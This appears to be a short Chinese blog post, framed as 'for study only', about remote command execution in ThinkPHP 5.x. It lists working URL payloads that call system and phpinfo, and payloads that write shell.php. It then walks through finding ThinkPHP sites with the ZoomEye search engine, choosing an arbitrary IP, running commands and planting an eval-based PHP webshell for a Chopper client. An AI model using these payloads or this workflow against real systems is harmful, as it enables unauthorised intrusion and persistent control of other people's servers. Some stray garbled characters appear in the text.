僅供學(xué)習(xí)參考禁止騷操作
漏洞詳情
??? 參考:http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/
附上幾個payload:
?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index/\think\Request/input&filter=system&data=id
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
為了精確查找thinkphp命令執(zhí)行漏洞我們可以使用鐘馗之眼搜索
鐘馗之眼搜索內(nèi)容:“thinkphp”或者“你值得信賴的php框架”
隨便進一個ip
執(zhí)行payload
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls -l
發(fā)現(xiàn)可以執(zhí)行系統(tǒng)命令伟葫,接著我們寫入一句話木馬赊抖。
payload為:?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][]=<?php @eval($_POST['pass']) ?>
寫入會顯示寫人文件大小30字節(jié)。
我們post以下phpinfo().
ok矮慕!shell上傳成功 接下來就可以使用菜刀連接了绊汹,這里就省略了。
